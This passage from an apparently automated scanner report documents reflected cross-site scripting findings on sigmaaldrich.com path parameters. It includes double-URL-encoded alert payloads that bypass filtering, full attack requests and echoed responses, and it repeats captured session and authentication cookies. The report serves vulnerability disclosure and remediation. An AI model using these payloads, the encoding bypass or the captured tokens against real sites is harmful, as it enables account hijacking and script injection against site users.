Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:01 GMT
Content-Length: 28977
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog7d3ac";alert(1)//8320d84cdb5","E404") ;
   </script>
...[SNIP]...

1.121. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9588b%2522%253balert%25281%2529%252f%252fd694049d19c was submitted in the REST URL parameter 1. This input was echoed as 9588b";alert(1)//d694049d19c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content9588b%2522%253balert%25281%2529%252f%252fd694049d19c/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:01 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content9588b";alert(1)//d694049d19c/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics","E404") ;
   </script>
...[SNIP]...

1.122. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1270%2522%253balert%25281%2529%252f%252f72a6bae4e31 was submitted in the REST URL parameter 2. This input was echoed as d1270";alert(1)//72a6bae4e31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichd1270%2522%253balert%25281%2529%252f%252f72a6bae4e31/areas-of-interest/life-science/sigma-transgenics HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:03 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichd1270";alert(1)//72a6bae4e31/areas-of-interest/life-science/sigma-transgenics","E404") ;
   </script>
...[SNIP]...

1.123. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e30da%2522%253balert%25281%2529%252f%252f329cab1f52b was submitted in the REST URL parameter 3. This input was echoed as e30da";alert(1)//329cab1f52b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-intereste30da%2522%253balert%25281%2529%252f%252f329cab1f52b/life-science/sigma-transgenics HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:05 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-intereste30da";alert(1)//329cab1f52b/life-science/sigma-transgenics","E404") ;
   </script>
...[SNIP]...

1.124. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3856b%2522%253balert%25281%2529%252f%252f49ce609ccd7 was submitted in the REST URL parameter 4. This input was echoed as 3856b";alert(1)//49ce609ccd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science3856b%2522%253balert%25281%2529%252f%252f49ce609ccd7/sigma-transgenics HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:07 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science3856b";alert(1)//49ce609ccd7/sigma-transgenics","E404") ;
   </script>
...[SNIP]...

1.125. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75418%2522%253balert%25281%2529%252f%252f03a73ef7977 was submitted in the REST URL parameter 5. This input was echoed as 75418";alert(1)//03a73ef7977 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics75418%2522%253balert%25281%2529%252f%252f03a73ef7977 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
